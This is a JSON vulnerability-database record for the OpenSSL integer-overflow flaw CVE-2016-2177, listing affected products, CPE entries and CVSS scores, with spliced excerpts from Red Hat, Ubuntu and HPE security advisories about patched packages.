"telepresence system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "1100" }, { "model": "unified communications manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "tandberg codian mse", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "83200" }, { "model": "ip series phones vpn feature", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "8800-0" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.3.0" }, { "model": "mobilefirst platform foundation", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.0" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.1.9" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.1.3" }, { "model": "emergency responder", "scope": null, "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "smartcloud entry", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.27" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.17" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.18" }, { "model": "enterprise manager base platform", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "13.2.0.0" }, { "model": "tealeaf customer experience", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.6" }, { "model": "email gateway", "scope": "ne", "trust": 0.3, "vendor": "mcafee", "version": "7.6.406-3402.103" }, { "model": "unified meetingplace 8.6mr1", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "telepresence mx series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "tapi service provider", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "video surveillance series ip cameras", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "70002.9" }, { "model": "telepresence system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "500-370" }, { "model": "spa525g 5-line ip phone", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "telepresence profile series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "secure access control system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.22" }, { "model": "unified ip conference phone for third-party call control 9.3 sr3", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "8831" }, { "model": "unified ip series phones", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "79000" }, { "model": "spa232d multi-line dect analog telephone adapter", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "1.4.2" }, { "model": "nexus series fabric switches aci mode", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "9000-0" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2.6" }, { "model": "visual quality experience tools server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "virtualization experience media edition", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "enterprise manager ops center", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "12.3.2" }, { "model": "emergency responder", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "email gateway 7.6.405h1157986", "scope": null, "trust": 0.3, "vendor": "mcafee", "version": null }, { "model": "project openssl 1.0.1l", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2.7" }, { "model": "registered envelope service", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "universal small cell series", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "70003.5.12.23" }, { "model": "firesight system software", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "physical access gateways", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "smartcloud entry appliance fi", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.3.0.4" }, { "model": "webex meetings client hosted t32", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.7.15" }, { "model": "unified meetingplace", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "security virtual server protection for vmware", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.1" }, { "model": "unified contact center express", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.6" }, { "model": "webex meetings server", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "2.6.1.30" }, { "model": "tivoli provisioning manager for images system edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x7.1.1.0" }, { "model": "communications network charging and control", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4.4.1.5.0" }, { "model": "project openssl 1.0.1h", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "email gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.6.402" }, { "model": "epolicy orchestrator", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "5.3.0" }, { "model": "project openssl 1.0.1p", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null } ], "sources": [ { "db": "BID", "id": "91319" }, { "db": "JVNDB", "id": "JVNDB-2016-003304" }, { "db": "NVD", "id": "CVE-2016-2177" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:hp:icewall_sso:10.0:*:*:*:certd:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:hp:icewall_mcrp:3.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:hp:icewall_sso:10.0:*:*:*:dfw:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:hp:icewall_sso_agent_option:10.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1m:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.2a:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1j:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1h:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.2e:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1r:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.2b:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1c:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1g:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.2g:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1a:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.2h:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1d:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1t:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.2c:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1p:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1k:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1b:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1n:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1q:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1e:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1l:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1f:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1s:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1o:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.2f:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1i:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.2d:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:oracle:solaris:11.3:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:oracle:linux:5:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:oracle:solaris:10:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:oracle:linux:6:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:oracle:linux:7:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "NVD", "id": "CVE-2016-2177" } ] }, "credits": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Red Hat", "sources": [ { "db": "PACKETSTORM", "id": "140717" }, { "db": "PACKETSTORM", "id": "143176" }, { "db": "PACKETSTORM", "id": "143181" }, { "db": "PACKETSTORM", "id": "140182" } ], "trust": 0.4 }, "cve": "CVE-2016-2177", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "acInsufInfo": false, "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "NVD", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "impactScore": 6.4, "integrityImpact": "PARTIAL", "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "trust": 1.0, "userInteractionRequired": false, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, { "acInsufInfo": null, "accessComplexity": "Low", "accessVector": "Network", "authentication": "None", "author": "NVD", "availabilityImpact": "Partial", "baseScore": 7.5, "confidentialityImpact": "Partial", "exploitabilityScore": null, "id": "CVE-2016-2177", "impactScore": null, "integrityImpact": "Partial", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "High", "trust": 0.9, "userInteractionRequired": null, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" } ], "cvssV3": [ { "attackComplexity": "LOW", "attackVector": "NETWORK", "author": "NVD", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "exploitabilityScore": 3.9, "impactScore": 5.9, "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "trust": 1.0, "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0" }, { "attackComplexity": "Low", "attackVector": "Network", "author": "NVD", "availabilityImpact": "High", "baseScore": 9.8, "baseSeverity": "Critical", "confidentialityImpact": "High", "exploitabilityScore": null, "id": "CVE-2016-2177", "impactScore": null, "integrityImpact": "High", "privilegesRequired": "None", "scope": "Unchanged", "trust": 0.8, "userInteraction": "None", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0" } ], "severity": [ { "author": "NVD", "id": "CVE-2016-2177", "trust": 1.8, "value": "CRITICAL" }, { "author": "VULMON", "id": "CVE-2016-2177", "trust": 0.1, "value": "HIGH" } ] } ], "sources": [ { "db": "VULMON", "id": "CVE-2016-2177" }, { "db": "JVNDB", "id": "JVNDB-2016-003304" }, { "db": "NVD", "id": "CVE-2016-2177" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "OpenSSL through 1.0.2h incorrectly uses pointer arithmetic for heap-buffer boundary checks, which might allow remote attackers to cause a denial of service (integer overflow and application crash) or possibly have unspecified other impact by leveraging unexpected malloc behavior, related to s3_srvr.c, ssl_sess.c, and t1_lib.c. Supplementary information : CWE Vulnerability type by CWE-190: Integer Overflow or Wraparound ( Integer overflow or wraparound ) Has been identified. OpenSSL is prone to an integer-overflow vulnerability because it fails to adequately bounds-check user-supplied data before copying it into an insufficiently sized buffer. \nAn attacker can exploit this issue to execute arbitrary code in the context of the user running the affected application. Failed exploit attempts will likely result in denial-of-service conditions. \nOpenSSL 1.0.2h and prior versions are vulnerable. \n-----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n=====================================================================\n Red Hat Security Advisory\n\nSynopsis: Important: Red Hat JBoss Core Services Apache HTTP Server 2.4.23 Release on RHEL 7\nAdvisory ID: RHSA-2017:0194-01\nProduct: Red Hat JBoss Core Services\nAdvisory URL: https://access.redhat.com/errata/RHSA-2017:0194\nIssue date: 2017-01-25\nCVE Names: CVE-2016-2108 CVE-2016-2177 CVE-2016-2178 \n CVE-2016-4459 CVE-2016-6808 CVE-2016-8612 \n=====================================================================\n\n1. Summary:\n\nAn update is now available for JBoss Core Services on RHEL 7. \n\nRed Hat Product Security has rated this update as having a security impact\nof Important. A Common Vulnerability Scoring System (CVSS) base score,\nwhich gives a detailed severity rating, is available for each vulnerability\nfrom the CVE link(s) in the References section. \n\n2. Relevant releases/architectures:\n\nRed Hat JBoss Core Services on RHEL 7 Server - noarch, ppc64, x86_64\n\n3. Description:\n\nThis release adds the new Apache HTTP Server 2.4.23 packages that are part\nof the JBoss Core Services offering. \n\nThis release serves as a replacement for Red Hat JBoss Core Services Pack\nApache Server 2.4.6 and includes bug fixes and enhancements. Refer to the\nRelease Notes for information on the most significant bug fixes and\nenhancements included in this release. \n(CVE-2016-2108)\n\n* It was found that the length checks prior to writing to the target buffer\nfor creating a virtual host mapping rule did not take account of the length\nof the virtual host name, creating the potential for a buffer overflow. \n(CVE-2016-2178)\n\n* Multiple integer overflow flaws were found in the way OpenSSL performed\npointer arithmetic. A remote attacker could possibly use these flaws to\ncause a TLS/SSL server or client using OpenSSL to crash. (CVE-2016-2177)\n\n* It was discovered that specifying configuration with a JVMRoute path\nlonger than 80 characters will cause segmentation fault leading to a server\ncrash. (CVE-2016-4459)\n\n* An error was found in protocol parsing logic of mod_cluster load balancer\nApache HTTP Server modules. An attacker could use this flaw to cause a\nSegmentation Fault in the serving httpd process. (CVE-2016-8612)\n\nRed Hat would like to thank the OpenSSL project for reporting\nCVE-2016-2108. The CVE-2016-4459 issue was discovered by Robert Bost (Red\nHat). Upstream acknowledges Huzaifa Sidhpurwala (Red Hat), Hanno Bock, and\nDavid Benjamin (Google) as the original reporters of CVE-2016-2108. \n\n4. Solution:\n\nFor details on how to apply this update, which includes the changes\ndescribed in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258\n\nFor the update to take effect, all services linked to the OpenSSL library\nmust be restarted, or the system rebooted. After installing the updated\npackages, the httpd daemon will be restarted automatically. \n\n5. Package List:\n\nRed Hat JBoss Core Services on RHEL 7 Server:\n\nSource:\njbcs-httpd24-httpd-2.4.23-102.jbcs.el7.src.rpm\njbcs-httpd24-mod_auth_kerb-5.4-35.jbcs.el7.src.rpm\njbcs-httpd24-mod_bmx-0.9.6-14.GA.jbcs.el7.src.rpm\njbcs-httpd24-mod_cluster-native-1.3.5-13.Final_redhat_1.jbcs.el7.src.rpm\njbcs-httpd24-mod_jk-1.2.41-14.redhat_1.jbcs.el7.src.rpm\njbcs-httpd24-mod_rt-2.4.1-16.GA.jbcs.el7.src.rpm\njbcs-httpd24-mod_security-2.9.1-18.GA.jbcs.el7.src.rpm\njbcs-httpd24-nghttp2-1.12.0-9.jbcs.el7.src.rpm\njbcs-httpd24-openssl-1.0.2h-12.jbcs.el7.src.rpm\n\nnoarch:\njbcs-httpd24-httpd-manual-2.4.23-102.jbcs.el7.noarch.rpm\n\nppc64:\njbcs-httpd24-httpd-2.4.23-102.jbcs.el7.ppc64.rpm\njbcs-httpd24-httpd-debuginfo-2.4.23-102.jbcs.el7.ppc64.rpm\njbcs-httpd24-httpd-devel-2.4.23-102.jbcs.el7.ppc64.rpm\njbcs-httpd24-httpd-selinux-2.4.23-102.jbcs.el7.ppc64.rpm\njbcs-httpd24-httpd-src-zip-2.4.23-102.jbcs.el7.ppc64.rpm\njbcs-httpd24-httpd-tools-2.4.23-102.jbcs.el7.ppc64.rpm\njbcs-httpd24-httpd-zip-2.4.23-102.jbcs.el7.ppc64.rpm\njbcs-httpd24-mod_auth_kerb-5.4-35.jbcs.el7.ppc64.rpm\njbcs-httpd24-mod_auth_kerb-debuginfo-5.4-35.jbcs.el7.ppc64.rpm\njbcs-httpd24-mod_bmx-0.9.6-14.GA.jbcs.el7.ppc64.rpm\njbcs-httpd24-mod_bmx-debuginfo-0.9.6-14.GA.jbcs.el7.ppc64.rpm\njbcs-httpd24-mod_bmx-src-zip-0.9.6-14.GA.jbcs.el7.ppc64.rpm\njbcs-httpd24-mod_cluster-native-1.3.5-13.Final_redhat_1.jbcs.el7.ppc64.rpm\njbcs-httpd24-mod_cluster-native-debuginfo-1.3.5-13.Final_redhat_1.jbcs.el7.ppc64.rpm\njbcs-httpd24-mod_jk-ap24-1.2.41-14.redhat_1.jbcs.el7.ppc64.rpm\njbcs-httpd24-mod_jk-debuginfo-1.2.41-14.redhat_1.jbcs.el7.ppc64.rpm\njbcs-httpd24-mod_jk-manual-1.2.41-14.redhat_1.jbcs.el7.ppc64.rpm\njbcs-httpd24-mod_ldap-2.4.23-102.jbcs.el7.ppc64.rpm\njbcs-httpd24-mod_proxy_html-2.4.23-102.jbcs.el7.ppc64.rpm\njbcs-httpd24-mod_rt-2.4.1-16.GA.jbcs.el7.ppc64.rpm\njbcs-httpd24-mod_rt-debuginfo-2.4.1-16.GA.jbcs.el7.ppc64.rpm\njbcs-httpd24-mod_rt-src-zip-2.4.1-16.GA.jbcs.el7.ppc64.rpm\njbcs-httpd24-mod_security-2.9.1-18.GA.jbcs.el7.ppc64.rpm\njbcs-httpd24-mod_security-debuginfo-2.9.1-18.GA.jbcs.el7.ppc64.rpm\njbcs-httpd24-mod_security-src-zip-2.9.1-18.GA.jbcs.el7.ppc64.rpm\njbcs-httpd24-mod_session-2.4.23-102.jbcs.el7.ppc64.rpm\njbcs-httpd24-mod_ssl-2.4.23-102.jbcs.el7.ppc64.rpm\njbcs-httpd24-nghttp2-1.12.0-9.jbcs.el7.ppc64.rpm\njbcs-httpd24-nghttp2-debuginfo-1.12.0-9.jbcs.el7.ppc64.rpm\njbcs-httpd24-openssl-1.0.2h-12.jbcs.el7.ppc64.rpm\njbcs-httpd24-openssl-debuginfo-1.0.2h-12.jbcs.el7.ppc64.rpm\njbcs-httpd24-openssl-devel-1.0.2h-12.jbcs.el7.ppc64.rpm\njbcs-httpd24-openssl-libs-1.0.2h-12.jbcs.el7.ppc64.rpm\njbcs-httpd24-openssl-perl-1.0.2h-12.jbcs.el7.ppc64.rpm\njbcs-httpd24-openssl-static-1.0.2h-12.jbcs.el7.ppc64.rpm\n\nx86_64:\njbcs-httpd24-httpd-2.4.23-102.jbcs.el7.x86_64.rpm\njbcs-httpd24-httpd-debuginfo-2.4.23-102.jbcs.el7.x86_64.rpm\njbcs-httpd24-httpd-devel-2.4.23-102.jbcs.el7.x86_64.rpm\njbcs-httpd24-httpd-selinux-2.4.23-102.jbcs.el7.x86_64.rpm\njbcs-httpd24-httpd-src-zip-2.4.23-102.jbcs.el7.x86_64.rpm\njbcs-httpd24-httpd-tools-2.4.23-102.jbcs.el7.x86_64.rpm\njbcs-httpd24-httpd-zip-2.4.23-102.jbcs.el7.x86_64.rpm\njbcs-httpd24-mod_auth_kerb-5.4-35.jbcs.el7.x86_64.rpm\njbcs-httpd24-mod_auth_kerb-debuginfo-5.4-35.jbcs.el7.x86_64.rpm\njbcs-httpd24-mod_bmx-0.9.6-14.GA.jbcs.el7.x86_64.rpm\njbcs-httpd24-mod_bmx-debuginfo-0.9.6-14.GA.jbcs.el7.x86_64.rpm\njbcs-httpd24-mod_bmx-src-zip-0.9.6-14.GA.jbcs.el7.x86_64.rpm\njbcs-httpd24-mod_cluster-native-1.3.5-13.Final_redhat_1.jbcs.el7.x86_64.rpm\njbcs-httpd24-mod_cluster-native-debuginfo-1.3.5-13.Final_redhat_1.jbcs.el7.x86_64.rpm\njbcs-httpd24-mod_jk-ap24-1.2.41-14.redhat_1.jbcs.el7.x86_64.rpm\njbcs-httpd24-mod_jk-debuginfo-1.2.41-14.redhat_1.jbcs.el7.x86_64.rpm\njbcs-httpd24-mod_jk-manual-1.2.41-14.redhat_1.jbcs.el7.x86_64.rpm\njbcs-httpd24-mod_ldap-2.4.23-102.jbcs.el7.x86_64.rpm\njbcs-httpd24-mod_proxy_html-2.4.23-102.jbcs.el7.x86_64.rpm\njbcs-httpd24-mod_rt-2.4.1-16.GA.jbcs.el7.x86_64.rpm\njbcs-httpd24-mod_rt-debuginfo-2.4.1-16.GA.jbcs.el7.x86_64.rpm\njbcs-httpd24-mod_rt-src-zip-2.4.1-16.GA.jbcs.el7.x86_64.rpm\njbcs-httpd24-mod_security-2.9.1-18.GA.jbcs.el7.x86_64.rpm\njbcs-httpd24-mod_security-debuginfo-2.9.1-18.GA.jbcs.el7.x86_64.rpm\njbcs-httpd24-mod_security-src-zip-2.9.1-18.GA.jbcs.el7.x86_64.rpm\njbcs-httpd24-mod_session-2.4.23-102.jbcs.el7.x86_64.rpm\njbcs-httpd24-mod_ssl-2.4.23-102.jbcs.el7.x86_64.rpm\njbcs-httpd24-nghttp2-1.12.0-9.jbcs.el7.x86_64.rpm\njbcs-httpd24-nghttp2-debuginfo-1.12.0-9.jbcs.el7.x86_64.rpm\njbcs-httpd24-openssl-1.0.2h-12.jbcs.el7.x86_64.rpm\njbcs-httpd24-openssl-debuginfo-1.0.2h-12.jbcs.el7.x86_64.rpm\njbcs-httpd24-openssl-devel-1.0.2h-12.jbcs.el7.x86_64.rpm\njbcs-httpd24-openssl-libs-1.0.2h-12.jbcs.el7.x86_64.rpm\njbcs-httpd24-openssl-perl-1.0.2h-12.jbcs.el7.x86_64.rpm\njbcs-httpd24-openssl-static-1.0.2h-12.jbcs.el7.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security. Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n7. References:\n\nhttps://access.redhat.com/security/cve/CVE-2016-2108\nhttps://access.redhat.com/security/cve/CVE-2016-2177\nhttps://access.redhat.com/security/cve/CVE-2016-2178\nhttps://access.redhat.com/security/cve/CVE-2016-4459\nhttps://access.redhat.com/security/cve/CVE-2016-6808\nhttps://access.redhat.com/security/cve/CVE-2016-8612\nhttps://access.redhat.com/security/updates/classification/#important\n\n8. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2017 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niD8DBQFYiQWBXlSAg2UNWIIRArWdAJwO4BE3aBxonVdBzdTUsNa+5ZKLmwCfSRUf\n2AmaztKx6GqFZTJkumoOcS8=\n=0wxz\n-----END PGP SIGNATURE-----\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://www.redhat.com/mailman/listinfo/rhsa-announce\n. Description:\n\nRed Hat JBoss Enterprise Application Platform is a platform for Java\napplications based on the JBoss Application Server. For\nfurther information, see the knowledge base article linked to in the\nReferences section. The JBoss server process must be restarted for the update\nto take effect. Solution:\n\nBefore applying this update, back up your existing Red Hat JBoss Enterprise\nApplication Platform installation and deployed applications. ==========================================================================\nUbuntu Security Notice USN-3087-2\nSeptember 23, 2016\n\nopenssl regression\n==========================================================================\n\nA security issue affects these releases of Ubuntu and its derivatives:\n\n- Ubuntu 16.04 LTS\n- Ubuntu 14.04 LTS\n- Ubuntu 12.04 LTS\n\nSummary:\n\nUSN-3087-1 introduced a regression in OpenSSL. \n\nSoftware Description:\n- openssl: Secure Socket Layer (SSL) cryptographic library and tools\n\nDetails:\n\nUSN-3087-1 fixed vulnerabilities in OpenSSL. The fix for CVE-2016-2182 was\nincomplete and caused a regression when parsing certificates. This update\nfixes the problem. \n\nWe apologize for the inconvenience. This\n issue has only been addressed in Ubuntu 16.04 LTS in this update. (CVE-2016-2178)\n Quan Luo discovered that OpenSSL did not properly restrict the lifetime\n of queue entries in the DTLS implementation. (CVE-2016-2179)\n Shi Lei discovered that OpenSSL incorrectly handled memory in the\n TS_OBJ_print_bio() function. (CVE-2016-2180)\n It was discovered that the OpenSSL incorrectly handled the DTLS anti-replay\n feature. (CVE-2016-2181)\n Shi Lei discovered that OpenSSL incorrectly validated division results. \n (CVE-2016-2182)\n Karthik Bhargavan and Gaetan Leurent discovered that the DES and Triple DES\n ciphers were vulnerable to birthday attacks. This update moves DES from the HIGH cipher list to MEDIUM. \n (CVE-2016-2183)\n Shi Lei discovered that OpenSSL incorrectly handled certain ticket lengths. \n (CVE-2016-6302)\n Shi Lei discovered that OpenSSL incorrectly handled memory in the\n MDC2_Update() function. (CVE-2016-6303)\n Shi Lei discovered that OpenSSL incorrectly performed certain message\n length checks. (CVE-2016-6306)\n\nUpdate instructions:\n\nThe problem can be corrected by updating your system to the following\npackage versions:\n\nUbuntu 16.04 LTS:\n libssl1.0.0 1.0.2g-1ubuntu4.5\n\nUbuntu 14.04 LTS:\n libssl1.0.0 1.0.1f-1ubuntu2.21\n\nUbuntu 12.04 LTS:\n libssl1.0.0 1.0.1-4ubuntu5.38\n\nAfter a standard system update you need to reboot your computer to make\nall the necessary changes. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA256\n\nNote: the current version of the following document is available here:\nhttps://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-hpesbhf03763en_us\n\nSUPPORT COMMUNICATION - SECURITY BULLETIN\n\nDocument ID: hpesbhf03763en_us\nVersion: 1\n\nHPESBHF03763 rev.1 - HPE Comware 7, IMC, VCX products using OpenSSL, Remote\nDenial of Service (DoS)\n\nNOTICE: The information in this Security Bulletin should be acted upon as\nsoon as possible. \n\nRelease Date: 2017-08-01\nLast Updated: 2017-08-01\n\nPotential Security Impact: Remote: Denial of Service (DoS)\n\nSource: Hewlett Packard Enterprise, Product Security Response Team\n\nVULNERABILITY SUMMARY\nA potential security vulnerability has been identified in Comware 7, IMC, VCX\nproducts using OpenSSL. \n\n - Comware v7 